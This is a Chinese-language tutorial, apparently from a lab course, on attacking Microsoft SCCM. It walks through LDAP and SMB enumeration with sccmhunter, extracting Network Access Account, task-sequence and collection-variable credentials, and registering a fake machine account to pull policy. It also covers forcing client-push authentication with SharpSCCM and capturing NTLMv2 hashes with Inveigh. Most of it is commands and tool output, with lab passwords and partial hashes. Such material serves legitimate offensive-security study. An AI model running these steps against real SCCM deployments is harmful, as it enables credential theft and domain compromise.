SCCM利用
1. SCCM 枚举
SCCM是一项可选服务,并非每个组织都会安装
一个部署了SCCM的AD通常会有以下的特点:
- 会创建一个名为
CN=System Management,CN=System的新容器,该容器的内容可以获取不同的站点服务器及其角色 - LDAP 会创建新的
object class条目,例如mssmsmanagementpoint或mssmssite
1.1. 利用sccmhunter进行枚举SCCM
sccmhunter 工具能够执行多种攻击和枚举操作。该工具提供了对 SCCM 的多种利用,包括枚举功能,并支持多种攻击场景。
1.1.1. 安装sccmhunter
uv tool install git+https://github.com/garrettfoster13/sccmhunter
1.1.2. 枚举SCCM
Sccmhunter可以帮助我们枚举以下内容
- SCCM 站点代码 (Site Code)。
- 服务器是否为中心管理站点 (CAS)。
- SMB 签名状态(有助于后续进行 NTLM 重放攻击)。
- 服务器是否为 SCCM 主站点服务器 (Primary Server)。
- 服务器是否为 SCCM 分发点 (Distribution Point)。
- 服务器是否为 SCCM SMS 提供程序 (SMS Provider)。
- 服务器上是否运行了WSUS 和 MSSQL 服务。
1.1.3. 使用sccmhunter进行LDAP枚举
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql] └─# sccmhunter.py find -u blwasp -p Password123! -d lab.local -dc-ip 172.50.0.10 SCCMHunter v2.0.0 by @unsigned_sh0rt [10:57:49] INFO [!] First time use detected. [10:57:49] INFO [!] SCCMHunter data will be saved to /root/.sccmhunter [10:57:52] INFO [*] Checking for System Management Container. [10:57:53] INFO [+] Found System Management Container. Parsing DACL. [10:57:55] INFO [+] Found 2 computers with Full Control ACE [10:57:55] INFO [*] Querying LDAP for published Sites and Management Points [10:57:56] INFO [+] Found 1 Management Points in LDAP. [10:57:56] INFO [*] Querying LDAP for potential PXE enabled distribution points [10:57:56] INFO [+] Found 1 potential Distribution Points in LDAP. [10:57:57] INFO [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM' [10:57:58] INFO [+] Found 9 principals that contain the string 'SCCM' or 'MECM'.
find 命令使用 LDAP 查询来识别 SCCM 相关基础设施的存在:
- 检查在 AD 架构扩展期间手动创建的
System Management容器的 DACL - 检查已发布的
Managment Points - 在整个目录中检查字符串
SCCM和MECM
在命令执行期间使用 -debug 选项,或者在执行命令后使用show -all可以查看到结果
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py show -all
SCCMHunter v2.0.0 by @unsigned_sh0rt
[10:58:43] INFO [+] Showing SiteServers Table
[10:58:43] INFO +------------------+------------+-------+-----------------+--------------+---------------
+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer | SMSProvider
| Config | MSSQL |
+==================+============+=======+=================+==============+===============
+==========+=========+
| sccm02.lab.local | | | | True |
| | |
+------------------+------------+-------+-----------------+--------------+---------------
+----------+---------+
| sccm01.lab.local | | | | True |
| | |
+------------------+------------+-------+-----------------+--------------+---------------
+----------+---------+
[10:58:43] INFO [+] Showing ManagementPoints Table
[10:58:43] INFO +------------------+------------+-----------------+
| Hostname | SiteCode | SigningStatus |
+==================+============+=================+
| sccm01.lab.local | HTB | |
+------------------+------------+-----------------+
[10:58:43] INFO [+] Showing USERS Table
[10:58:43] INFO +------------+------------+------------------+------------------------+---------------+
| cn | name | sAMAAccontName | servicePrincipalName | description |
+============+============+==================+========================+===============+
| sccm_push | sccm_push | sccm_push | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_naa | sccm_naa | sccm_naa | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_admin | sccm_admin | sccm_admin | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_sql | sccm_sql | sccm_sql | | |
+------------+------------+------------------+------------------------+---------------+
[10:58:43] INFO [+] Showing GROUPS Table
[10:58:43] INFO +------------+------------+------------------+----------------------------------------+--
-------------+
| cn | name | sAMAAccontName | member |
description |
+============+============+==================+========================================+==
=============+
| SCCM_users | SCCM_users | SCCM_users | CN=Rai MC,CN=Users,DC=lab,DC=local |
|
| | | | CN=sccm_push,CN=Users,DC=lab,DC=local |
|
| | | | CN=sccm_naa,CN=Users,DC=lab,DC=local |
|
| | | | CN=sccm_admin,CN=Users,DC=lab,DC=local |
|
| | | | CN=sccm_sql,CN=Users,DC=lab,DC=local |
|
+------------+------------+------------------+----------------------------------------+--
-------------+
[10:58:43] INFO [+] Showing COMPUTERS Table
[10:58:43] INFO +--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint |
DistributionPoint | SMSProvider | WSUS | MSSQL |
+====================+============+=================+==============+===================+=
====================+===============+========+=========+
| sccm02.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| sccm01.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SQL.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM02.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM-SMS.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM01.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
[10:58:43] INFO [+] Showing SiteDatabases Table
[10:58:43] INFO +------------+---------+
| Hostname | MSSQL |
+============+=========+
+------------+---------+
1.1.4. 利用sccmhunter的SMB模块进行枚举
利用 smb 模块来分析和列出已识别 SCCM 服务器的 SMB 共享,该模块会列出默认配置下的多项服务,包括 SMB、HTTP(S)和 MSSQL。侦察过程分为三个部分: 使用选项 smb 枚举 SCCM,我们必须能够连接到正在检查的各种服务
对站点服务器进行资产分析(Profiling):
- 验证连通性:确认目标服务器是否在线。
- 验证站点服务器是否托管 MSSQL 服务:检查服务器上是否运行着数据库。
- 确定站点服务器是“活动”还是“被动”状态:在 SCCM 高可用性架构中,识别主用和备用节点。
- 识别站点服务器是否为中心管理站点 (CAS):确定其在 SCCM 层级结构中的位置。
管理点 (Management Point) 验证:
- 验证 HTTP 终端的连通性:检查与管理点相关的 Web 服务是否正常响应。
检查角色与配置:
- 从默认文件共享中搜索关联的站点代码:通过读取共享文件(如
SMS_站点代码)来确认其身份。 - 验证 SMB 签名是否已关闭:检查是否存在NTLM 重放攻击(Relay)的漏洞机会。
- 识别站点系统角色:例如站点服务器 (Site Server)、管理点 (Management Point)、分发点 (Distribution Point)、SMS 提供程序 (SMS Provider)、MSSQL 以及 WSUS。
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py smb -u blwasp -p Password123! -d lab.local -dc-ip 172.50.0.10 -save
SCCMHunter v2.0.0 by @unsigned_sh0rt
[11:01:56] INFO Profiling 2 site servers.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Site Servers.
[11:01:56] INFO +------------------+-------------------+-------+-----------------+--------------+--------
-------+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer |
SMSProvider | Config | MSSQL |
+==================+===================+=======+=================+==============+========
=======+==========+=========+
| sccm02.lab.local | Connection Failed | | | True |
| | |
+------------------+-------------------+-------+-----------------+--------------+--------
-------+----------+---------+
| sccm01.lab.local | Connection Failed | | | True |
| | |
+------------------+-------------------+-------+-----------------+--------------+--------
-------+----------+---------+
[11:01:56] INFO [+] Finished profiling potential Site Databases.
[11:01:56] INFO +------------+---------+
| Hostname | MSSQL |
+============+=========+
+------------+---------+
[11:01:56] INFO Profiling 1 management points.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Management Points.
[11:01:56] INFO +------------------+------------+-----------------+
| Hostname | SiteCode | SigningStatus |
+==================+============+=================+
| sccm01.lab.local | HTB | |
+------------------+------------+-----------------+
[11:01:56] INFO Profiling 1 distribution points.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Distribution Points.
[11:01:56] INFO +---------------+-----------------+--------+-------+
| Hostname | SigningStatus | SCCM | WDS |
+===============+=================+========+=======+
| SQL.lab.local | | | |
+---------------+-----------------+--------+-------+
[11:01:56] INFO Profiling 6 computers.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling all discovered computers.
[11:01:56] INFO +--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint |
DistributionPoint | SMSProvider | WSUS | MSSQL |
+====================+============+=================+==============+===================+=
====================+===============+========+=========+
| sccm02.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| sccm01.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SQL.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM02.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM-SMS.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
| SCCM01.lab.local | | | | |
| | | |
+--------------------+------------+-----------------+--------------+-------------------+-
--------------------+---------------+--------+---------+
-save:如果找到了PXEboot var文件,会保存下来
PXEBoot variables file 可定制并自动化网络设备的启动过程,通过特定参数(如启动镜像位置、网络设置和脚本)引导设备,这确保了操作系统和配置在多台设备上的高效部署。该文件可能泄露关键的网络配置和凭据信息
1.2. SharpSCCM枚举
2. Abusing SCCM
完成了侦察阶段后,下一步是在SCCM基础设施上获取权限,
2.1. 凭据收集
凭据可以在客户端数据库、日志或 CIM 缓存中找到。对于管理点(Management Point)上的 SCCM 服务器更是如此,凭据可能会在那里存储或传输。通常,存储的凭据由 DPAPI 加密,因此需要较高的本地权限才能对其进行解密。(所以需要先获取一个特权用户)
2.1.1. 凭据常见的地方
以下是常见的可获取凭据的地方:
1. 设备集合变量 (Device Collection Variables):
集合 (Collections) 是将 SCCM 环境中的机器进行组合的机制。通过这些集合,可以对多台机器执行分组部署。SCCM 中既有默认集合,管理员也可以创建自定义集合(例如:“Windows Server 2019 设备”)。 设备集合变量是与这些集合相关联的“键-值对(key-value pairs)”。它们存储了在部署过程中可以被引用的信息,例如在安装应用程序或进行配置设置的任务序列(Task Sequences)中调用的参数。虽然这些变量可以动态地控制部署行为和条件,但它们也可能包含敏感的标识符或凭据
2. 任务序列变量 (Task Sequence Variables):
任务序列是为执行特定操作而配置的步骤,例如“将机器加入域的任务序列”。它们包含的变量可以用来存储各种标识符
3. 网络访问账户 (Network Access Accounts, NAAs):
NAA 是专门创建的域账户,用于当机器无法使用自身账户(例如机器尚未加入域)时,从 SCCM 架构中的分发点检索数据。NAA 的身份标识信息是通过服务器发送的 SCCM 策略获取的,并且可以经由 DPAPI 加密后存储在磁盘上。
即使删除或修改 NAA 标识符后,二进制文件仍包含加密的标识符。
此外,即便无法访问已经受感染的机器,也可以通过伪装成网络中的一台新机器并向服务器请求 SCCM 策略来获取 NAA。虽然 NAA 通常不具备特殊权限,但有时管理员会使用高权限账户来担任此角色
简而言之,如果我们可以获取到配置了SCCM的服务器的管理员账户,就可以解密DPAPI并获取机器上的机密信息。 我们可以通过sccmhunter远程获取,
2.1.2. 利用sccmhunter 获取SCCM机密
sccmhunter可以让我们远程获取SCCM机密,为了获取SCCM机密,我们需要指定dpapi参数,并指定一个方式,它通常有以下几种:
-wmi:用于提取存储在 WMI 仓库中的 SCCM 机密-disk:从磁盘(OBJECTS.DATA)中提取 SCCM 机密,这有助于访问可能已更改或删除的机密-both:结合以上两种
#使用wmi方式获取机密 ┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql] └─# sccmhunter.py dpapi -u rai -p Pxetesting01 -d lab.local -dc-ip 172.50.0.10 -target 172.50.0.21 -wmi SCCMHunter v2.0.0 by @unsigned_sh0rt [11:20:48] INFO [*] Starting SCCM secrets extraction via WMI [11:20:52] INFO [+] Found NAA credentials [11:21:53] INFO - NetworkAccessUsername: LAB\sccm_naa [11:21:53] INFO - NetworkAccessPassword: Password123! [11:21:56] INFO [+] Found Task Sequence [11:21:56] INFO - Task Sequence: <sequence version="3.10"><step type="SMS_TaskSequence_RunCommandLineAction" name="Run Command Line" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false"><action>smsswd.exe /run: powershell -c "$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); $sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</action><defaultVarList><variable name="CommandLine" property="CommandLine" hidden="true">powershell -c "$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); $sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</variable><variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable><variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName"></variable><variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable><variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable><variable name="SMSTSRunCommandLineUserName" property="UserName"></variable></defaultVarList></step></sequence> [11:21:58] INFO [+] Found Collection Variables [11:21:58] INFO - CollectionVariableName: An_interesting_variable [11:21:58] INFO - CollectionVariableValue: If needed : pusH_4ccoun7! [11:21:59] INFO [*] WMI SCCM secrets dump complete
2.1.3. 请求 SCCM 策略 手动获取 NAA
我们可以使用受管计算机账户来请求 SCCM 策略并手动获取 NAA(网络访问账户)。我们需要先用户一个域内机器的管理员权限
#创建计算机
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# addcomputer.py -computer-name 'hack$' -computer-pass 'Admin123' -dc-ip 172.50.0.10 'LAB.LOCAL/Blwasp':'Password123!'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account hack$ with password Admin123.
使用http模块伪装标准客户端注册(Client Enrollment),从已发现的管理点中获取 NAA 凭据,然后从刚才创建的计算机账户 hack$ 中提取策略。该模块会自动提取并解密这些 NAA 凭据
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py http -u blwasp -p 'Password123!' -dc-ip 172.50.0.10 -cn 'hack$' -cp 'Admin123' -debug
SCCMHunter v1.0.5 by @garrfoster
[11:24:04] INFO [*] Searching for Management Points from database.
[11:24:05] INFO [+] Found http://sccm01.lab.local/ccm_system_windowsauth
[11:24:05] INFO [*] Attempting to grab policy from sccm01.lab.local
[11:24:05] DEBUG [*] Creating certificate for our fake server...
[11:24:05] DEBUG [*] Registering our fake server...
[11:24:06] INFO [*] Done.. our ID is BFBE52FA-C563-4FFF-9BC8-9D6BC3D67A9D
[11:24:06] INFO [*] Waiting 10 seconds for database to update.
[11:24:16] DEBUG [*] Requesting NAAPolicy.. 2 secs
[11:24:16] DEBUG [*] Parsing for Secretz...
[11:24:18] INFO [+] Got NAA credential: LAB\sccm_naa:SCCMCreds01! [11:24:18] INFO [+] Got NAA credential: LAB\sccm_naa:SCCMCreds01! [11:24:18] INFO [+] Done.. decrypted policy dumped to /home/plaintext/.sccmhunter/logs/loot/sccm01_naapolicy.xml
可以使用 -auto参数,会自动创建机器并使用提供的凭据恢复策略。
2.1.4. Client Push Exploitation(DDR)
Client Push 账户部署系统很容易受到 NTLM 强制认证攻击
原理:通过向管理点发送 Data Discovery Record (DDR) 请求,然后通过 Heartbeat Discovery 机制来更新硬件清单和客户端信息
通过伪造DDR请求,以表明特定机器上未安装 SCCM 客户端。一旦接收到此信息,主服务器将立即尝试在伪造消息所指定的系统上安装 SCCM 客户端这会导致每个客户端推送账户依次进行身份验证,而这些账户通常拥有本地管理员权限,甚至在某些情况下拥有域管理员权限。如果这些账户尝试失败,站点服务器最终会切换到其计算机账户来尝试进行安装
利用 Client Push Exploitation ,SCCM 实施必须具备特定的先决条件:
- 未应用 KB15599094补丁,此补丁禁用了 NTLM 身份验证
- NTLM协议未被手动禁用
- 没有使用HTTPS
- 客户端推送账户不得使用 PKI 证书进行身份验证
此攻击必须从已加入域的 Windows 计算机上使用SharpSCCM执行,然后我们用Inveigh来进行捕获哈希
PS C:\Tools> .\SharpSCCM.exe invoke client-push -t 172.50.0.51
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209CA0201033082098606092A864886F70D010701A0820977048209733082096F3082058806092A864886F70D010701A0...SNIP...
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: 172.50.0.51
NetBIOS name: 172.50.0.51
Site code: HTB
[+] Sending HTTP registration request to SCCM01.lab.local:80
[+] Received unique SMS client GUID for new device:
GUID:7A77FDCB-4C7C-4A9D-84D0-85601E5BDE37
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7A77FDCB-4C7C-4A9D-84D0-85601E5BDE37 to MP_DdrEndpoint endpoint on SCCM01.lab.local:HTB and requesting client installation on 172.50.0.51
[+] Completed execution in 00:00:06.4031058
PS C:\Tools> .\Inveigh.exe
[*] Inveigh 0.913 started at 2024-07-10T20:26:22
[*] Process ID = 2336
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.50.0.51
[+] Spoofer IP Address = 172.50.0.51
...SNIP...
[+] Output Directory = C:\Tools
[*] Press ESC to access console
sccm_test::LAB:F701CD0BEF81F601:52AD33FC58EDFFE795116E8A12EEDC4F:0101000000000000F86871...SNIP...
[!] [2024-07-10T20:30:12] SMB(445) NTLMv2 written to Inveigh-NTLMv2.txt
[+] [2024-07-10T20:30:12] TCP(445) SYN packet from 172.50.0.21:59514
[+] [2024-07-10T20:30:12] SMB(445) NTLM challenge 0047628E5BDF8905 sent to 172.50.0.21:59514
[+] [2024-07-10T20:30:12] SMB(445) NTLMv2 ignored for LAB\SCCM01$ from 172.50.0.21(SCCM01):59514:
[machine account]
然后可以尝试破解捕获到的哈希